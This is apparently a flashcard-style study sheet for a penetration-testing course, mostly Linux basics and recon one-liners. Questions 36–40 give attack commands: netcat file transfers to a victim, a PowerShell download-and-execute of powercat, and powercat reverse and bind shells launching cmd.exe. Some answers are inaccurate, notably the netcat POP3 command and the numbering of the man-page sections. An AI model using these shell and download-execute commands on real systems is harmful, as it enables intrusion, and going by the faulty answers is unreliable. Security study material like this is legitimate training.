Introduction

Question 1

What is the Linux directory for basic programs, and what are some example programs found there?

Answer 1

• /bin

- ls, cd, cat

Question 2

What is the Linux directory for system programs, and what are some example programs found there?

Answer 2

• /sbin

- fdisk, mkfs, sysctl

Question 3

What is the Linux directory for configuration files?

Answer 3

/etc

Question 4

What is the Linux directory for applications, and what are some example programs found there?

Answer 4

• /usr/bin

- apt, ncat, nmap

Question 5

What is the Linux directory for application support and data files?

Answer 5

/usr/share

Question 6

What are the 8 sections of ‘man’ pages?

Answer 6

1. User commands
2. Programming interfaces and kernel sys calls
3. Programming interfaces to the C library
4. Special files such as device nodes and drivers
5. File formats
6. Games and amusements such as screen-savers
   7, Misc
7. System administration commands

Question 7

How would you search the ‘man’ page for the ‘passwd’ command with a keyword search for ‘passwd’?

Answer 7

man -k passwd

Question 8

What would be the regex command to search the ‘man’ page for ‘passwd’ command to match on the entire line and avoid sub-string matches?

Answer 8

man -k ‘^passwd$’

Question 9

How would you search the File Formats section of the man page for the ‘passwd’ command?

Answer 9

man 5 passwd

Question 10

What are the three commands to find files in Linux?

Answer 10

• which
• find
• locate

Question 11

What is the database used by the ‘locate’ command to search for files in Linux? How do you update this db?

Answer 11

• locate.db

- sudo updatedb

Question 12

How do you start SSH in Linux?

Answer 12

sudo systemctl start ssh

Question 13

What does the ‘ss’ command do?

Answer 13

• ‘ss’ = another utility to investigate sockets
• used to dump socket statistics
• allows showing information similar to netstat
• it can display more TCP and state information than other tools

Question 14

What does the command ‘ss -antlp’ do?

Answer 14

• ‘a’ = all; displays both listening and non-listening sockets
• ‘n’ = numeric; shows exact bandwidth values, not human-readable
• ‘t’ = tcp sockets
• ‘p’ = process; show process using the socket
• ‘l’ = listening; display only listening sockets

Question 15

What command would enable SSH to run at start?

Answer 15

sudo systemctl enable ssh

Question 16

What command starts the Apache server?

Answer 16

sudo systemctl start apache2

Question 17

What command displays a list of all available services?

Answer 17

systemctl list-unit-files

Question 18

What command completely removes the package pure-ftpd from Linux?

Answer 18

sudo apt remove –purge pure-ftpd

Question 19

What is PATH?

Answer 19

• a colon-separated list of directory paths that Bash will search through whenever a command is run without a full path

Question 20

How do you display the contents of the PATH environment variable?

Answer 20

echo $PATH

Question 21

How would you place the IP address 10.11.1.220 into an environment variable?

Answer 21

export b=10.11.1.220

Question 22

How do you display all current environment variables?

Answer 22

env

Question 23

How would you rerun a command that is labeled as 1239?

Answer 23

!1239

Question 24

How would you paste “Add this text” to the existing file text.txt?

Answer 24

echo “Add this text”&raquo_space; text.txt

Question 25

How would you redirect the contents of the file ‘test.txt’ to count the number of words?

Answer 25

wc -w < test.txt

Question 26

What is the file descriptor for STDIN?

Answer 26

0

Question 27

What is the file descriptor for STDOUT?

Answer 27

1

Question 28

What is the file descriptor for STDERR?

Answer 28

2

Question 29

How would you redirect error messages from displaying when running a command?

Answer 29

2>/dev/null

Question 30

How would you compare the differences between a.txt and b.txt with vim?

Answer 30

vimdiff a.txt b.txt

Question 31

What command displays all processes with the full format listing?

Answer 31

ps -ef

Question 32

How would you display the process for the program ‘tmux’?

Answer 32

ps -fC tmux

Question 33

What command allows you to monitor the log files for the Apache server?

Answer 33

sudo tail -f /var/log/apache2/access.log

Question 34

What command would you use transfer a file https://www.offensive-security.com/reports/penetration-testing-sample-report-2013.pdf and rename the file report.pdf

Answer 34

axel -a -n 20 -o report.pdf https://www.offensive-security.com/reports/penetration-testing-sample-report-2013.pdf

Question 35

How would you connect to a POP3 server at 10.11.0.22 using Netcat?

Answer 35

nc -nlvp 10.11.0.22 110

Question 36

How would you transfer a file ‘wget.exe’ from the attacking machine, to a victim machine as a file named ‘incoming.exe’?

Answer 36

(victim) nc -nlvp 4444 > incoming.exe

(attack) nc -nv 10.11.0.22 4444 < wget.exe

Question 37

How would you download Powercat.ps1 onto a victim machine with PowerShell?

Answer 37

c:> iex(New-Object System.Net.Webclient). DownloadString (‘https://raw.githubusercontent.com/ besimorhino/powercat/master/powercat.ps1’)

Question 38

How would you transfer a file from a Windows (victim) machine to a Linux (attacking) machine?

Answer 38

1. kali:~$ sudo nc -nlvp 443 > receiving_powercat.ps1

2. C:> powercat -c 10.11.0.4 -p 443 -i C:\Users\ Offsec\powercat.ps1

Question 39

Powercat reverse shell?

Answer 39

(attacking) sudo nc -nlvp 443

(victim) powercat -c 10.11.0.4 -p 443 -e cmd.exe

Question 40

Powercat bind shell?

Answer 40

(victim) powercat -l -p 443 -e cmd.exe

(attacking) nc 10.11.0.22 443

Question 41

What Wireshark filter allows you to only look at traffic on the 10.11.1.0/24 subnet?

Answer 41

net 10.11.1.0/24

Question 42

What Wireshark filter allows you to only look at FTP traffic?

Answer 42

tcp.port == 21

Question 43

How would you use Linux to view the contents of the pcap file password_cracking_filtered.pcap?

Answer 43

sudo tcpdump -r password_cracking_filtered.pcap

Question 44

How would you use Linux to view the contents of the pcap file password_cracking_filtered.pcap, and filter on the source host 172.16.40.10?

Answer 44

sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap

Question 45

How would you download the index page of the website www.megacorpone.com

Answer 45

wget www.megacorpone.com

Question 46

What command would you use to extract all lines that contain “href=” in the index.html file?

Answer 46

grep “href=” index.html

Question 47

What command would you use to extract all lines that contain “href=” in the index.html file, and grab lines that only contain “.megacorpone”, and strip away lines that contain “www.megacorpone.com”?

Answer 47

grep “href=” index.html | grep “.megacorpone” | grep -v “www.megacorpone.com”

Question 48

What command would you use to extract all lines that contain “href=” in the index.html file, and grab lines that only contain “.megacorpone”, and strip away lines that contain “www.megacorpone.com”, and print everything after “http://”?

Answer 48

grep “href=” index.html | grep “.megacorpone” | grep -v “www.megacorpone.com” | awk -F “http://” ‘{print $2}’

Question 49

What command would you use to extract all lines that contain “href=” in the index.html file, and grab lines that only contain “.megacorpone”, and strip away lines that contain “www.megacorpone.com”, and print everything after “http://” and before the first ‘/’?

Answer 49

grep “href=” index.html | grep “.megacorpone” | grep -v “www.megacorpone.com” | awk -F “http://” ‘{print $2}’ | cut -d ‘/’ -f 1

Question 50

Using regex, how would you carve out “.megacorpone.com” subdomains from the file index.html, and list only unique entries?

Answer 50

grep -o ‘[^/]*.megacorpone.com’ index.html | sort -u

Question 51

What is a bash one-liner that will take a list of URLs in a file named ‘list.txt’, and provide the corresponding IP address?

Answer 51

for url in $(cat list.txt); do host $url; done